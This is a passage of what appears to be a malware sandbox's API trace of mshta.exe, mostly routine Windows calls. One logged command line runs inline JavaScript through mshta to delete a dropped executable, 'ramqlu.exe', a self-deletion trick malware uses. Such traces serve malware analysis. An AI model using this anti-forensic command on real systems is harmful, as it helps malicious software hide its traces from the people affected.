(lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x214) returned 0x7607d0 [0060.084] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.084] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.084] GetStartupInfoA (in: lpStartupInfo=0x2cfa84 | out: lpStartupInfo=0x2cfa84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.084] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x480) returned 0x7609f0 [0060.084] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.085] SetHandleCount (uNumber=0x20) returned 0x20 [0060.085] GetCommandLineA () returned="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" [0060.085] GetEnvironmentStringsW () returned 0x420260* [0060.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.085] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x565) returned 0x760e78 [0060.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x760e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.085] FreeEnvironmentStringsW (penv=0x420260) returned 1 [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetACP () returned 0x4e4 [0060.085] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x220) returned 0x7613e8 [0060.085] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cfa5c | out: lpCPInfo=0x2cfa5c) returned 1 [0060.086] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf528 | out: lpCPInfo=0x2cf528) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2cf4b8 | out: lpCharType=0x2cf4b8) returned 1 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf2a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā") returned 256 [0060.086] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā", cchSrc=256, lpCharType=0x2cf53c | out: lpCharType=0x2cf53c) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā") returned 256 [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā", cchSrc=256, lpDestStr=0x2cf038, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x2cf83c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿnfxÞtú,", lpUsedDefaultChar=0x0) returned 256 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf268, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā") returned 256 [0060.087] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.087] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā", cchSrc=256, lpDestStr=0x2cf058, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x2cf73c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿnfxÞtú,", lpUsedDefaultChar=0x0) returned 256 [0060.087] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.090] SetLastError (dwErrCode=0x0) [0060.090] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.091] SetLastError (dwErrCode=0x0) [0060.091] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.092] SetLastError (dwErrCode=0x0) [0060.092] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.093] SetLastError (dwErrCode=0x0) [0060.093] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.094] SetLastError (dwErrCode=0x0) [0060.094] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.095] SetLastError (dwErrCode=0x0) [0060.095] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.096] SetLastError (dwErrCode=0x0) [0060.096] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.097] SetLastError (dwErrCode=0x0) [0060.097] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.098] SetLastError (dwErrCode=0x0) [0060.098] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError (dwErrCode=0x0) [0060.099] GetLastError () returned 0x0 [0060.099] SetLastError 